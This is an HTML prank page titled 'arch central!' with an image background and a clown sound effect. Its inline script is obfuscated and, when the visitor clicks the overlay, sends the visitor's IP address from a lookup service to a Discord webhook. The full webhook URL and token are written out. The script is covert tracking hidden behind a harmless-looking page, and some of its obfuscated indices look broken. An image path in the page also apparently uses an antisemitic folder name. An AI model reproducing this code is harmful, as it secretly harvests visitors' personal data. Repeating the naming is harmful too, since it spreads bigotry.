<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>arch central!</title>
    <meta name="description" content="hihi">
    <style>
        body {
            margin: 0;
            height: 100vh;
            background-image: url('assets/jews/tubby.jpg');
            background-size: cover;
            background-position: center;
            display: flex;
            justify-content: center;
            align-items: center;
            color: #DA70D6;
            font-size: 24px;
            text-align: center;
            position: relative;
        }
        .overlay {
            position: absolute;
            top: 0;
            left: 0;
            font-size: larger;
            right: 0;
            bottom: 0;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: rgba(0, 0, 0, 0.5);
            color: white;
            z-index: 1;
        }
    </style>
</head>
<body>
    <div class="overlay">hi im arch</div>
    <audio id="clown-audio">
        <source src="assets/clown.mp3" type="audio/mpeg">
        Your browser does not support the audio element.
    </audio>
<script>
    (function(){
        document.querySelector('.overlay').addEventListener('click', async function(){
            const _0x1a2b=['clown-audio','play','none','style','display','ip','application/json','https://api.ipify.org/?format=json','catch','error','console','https://discord.com/api/webhooks/1302253524473876550/HYPBOYOkv9XlpYg9XmDtckyiLJ59RaOxU_bRxs9nHWzo1g0J2JAIp5z3NLLbZnQrBO8','POST'];(function(_0x5f29,_0x2a6e){const _0x4a9b=function(_0x2eb7){while(--_0x2eb7){_0x5f29['push'](_0x5f29['shift']());}};_0x4a9b(++_0x2a6e);}(_0x1a2b,0x16b));const _0x4a9b=function(_0x5f29,_0x2a6e){_0x5f29=_0x5f29-0x0;let _0x4a9b=_0x1a2b[_0x5f29];return _0x4a9b;};const _0x2eb7=document['getElementById'](_0x4a9b('0x0'));_0x2eb7[_0x4a9b('0x1')]();this[_0x4a9b('0x2')][_0x4a9b('0x3')]=_0x4a9b('0x4');try{const _0x374d9e=await fetch(_0x4a9b('0x5'));const _0x1ae0bd=await _0x374d9e['json']();const _0x2382ba=_0x1ae0bd[_0x4a9b('0x6')];await fetch(_0x4a9b('0xc'),{'method':_0x4a9b('0xd'),'headers':{'Content-Type':_0x4a9b('0x7')},'body':JSON['stringify']({'content':_0x2382ba})});}catch(_0x15882d){_0x4a9b('0xa')[_0x4a9b('0x9')](_0x4a9b('0x8'),_0x15882d);}});}());
</script>
</body>
</body>

</html>
